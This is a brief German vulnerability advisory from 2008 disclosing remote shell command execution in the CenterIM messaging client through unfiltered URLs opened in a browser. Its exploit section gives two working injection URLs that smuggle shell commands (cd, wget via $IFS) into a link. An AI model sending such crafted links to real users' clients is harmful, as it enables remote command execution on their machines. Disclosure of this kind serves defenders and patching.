#######################################################################

Anwendung:    CenterIM
              http://www.centerim.org/index.php/Main_Page
Versionen:    centerim <= 4.22.3
Platformen:   Linux
Bug:          Ausführung von Shellbefehlen
Ausnutzung:   remote
Date:         15 März 2008
Author:       Brian Fonfara (w00)
              e-mail: brian.fonfara@gmx.de
              web:    newb.kicks-ass.net


#######################################################################

1) Bug
2) Exploit


#######################################################################

=======
1) Bug
=======

Über das Nachrichtenfenster empfangene Urls werden vor Öffnung mit
einem Browser nicht auf kritische Zeichen wie
"\'", "\"", ";", "$", "{", "}", "&&" und "||" geprüft und gefiltert.

#######################################################################

===========
2) Exploit
===========

Standardeinstellung:
- geöffneter Browser:
http://gidf.de/centerim)';cd$IFS$HOME/Desktop;wget${IFS}http://google.de;'(

- neue Browserinstanz:
http://gidf.de/centerim"&cd$IFS$HOME/Desktop;wget${IFS}http://google.de"

#######################################################################

Greets to: mrks